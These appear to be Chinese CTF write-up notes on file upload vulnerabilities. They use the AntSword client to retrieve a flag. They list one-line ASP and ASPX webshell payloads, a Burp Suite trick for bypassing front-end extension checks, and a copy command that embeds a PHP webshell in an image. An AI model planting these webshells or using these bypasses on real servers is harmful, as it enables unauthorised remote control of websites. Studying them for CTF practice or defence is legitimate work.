打开一看结合题目,就是连接一下菜刀蚁剑,菜刀没用过只有蚁剑,下面用蚁剑实现
设置好URL和链接密码
找到flag文件
打开后找到flag
文件上传漏洞
一句话木马:
php
Asp
<%execute(request(“value”))%>
Aspx
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
前端判断文件后缀名可以Burp Suite配置好Proxy -> Options,并在Proxy->Intercept->Intercept is on,浏览器设置代理为Options中的配置,先把shell.php后缀改为jpg,然后提交,再filename中把文件shell.jpg后缀改为shell.php
图片马
一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
制作:
一个正常图片,一个木马文件,内容为php一句话木马,在命令框里
copy pic.jpg/b + php木马.php/a webshell.jpg生成图片马